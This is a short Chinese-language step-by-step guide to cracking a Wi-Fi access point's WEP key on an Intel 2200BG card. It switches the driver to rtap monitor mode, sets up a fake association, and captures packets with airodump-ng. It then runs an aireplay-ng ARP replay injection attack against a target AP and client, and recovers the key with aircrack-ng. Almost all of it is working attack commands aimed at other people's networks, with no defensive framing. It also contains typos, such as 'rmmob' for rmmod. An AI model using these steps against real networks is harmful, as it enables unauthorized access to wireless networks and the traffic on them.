(1)设置rtap0端口,并指定信道。
rmmob ipw2200
modprobe ipw2200 rtap_iface=1 channel=<ap 信道>
(2)建立虚拟连接,与其它网卡不同,2200BG必须设置为managed模式。
iwconfig eth1 ap <Ap mac>(这里的mac必须用:隔开)
iwconfig eth1 key s:fakekey(s:后跟任意密码)
iwconfig eth1 mode managed
(3)端口up
ifconfig eth1 up
ifconfig rtap0 up
这时可以用"iwconfig"看一下虚拟连接是否成功?并观察目标AP的加密方式是否为“开放式”,“共享式”只能等合法客户端出现。
(4)运行抓包命令。
airodump-ng --channel <AP
channel> --bssid <AP mac> -w <文件名> rtap0
(5)开新窗口,运行ARP注入式攻击
aireplay-ng --arpreplay -b <AP mac> -h <client mac> -i rtap0 eth1
(6)当data值达到1W时开新窗口,运行aircrack-ng命令P解密码
aircrack-ng -z -b <AP mac> 文件名*.cap
其实那些参数不要也没有关系,直接aircrack-ng 文件名*.cap即可。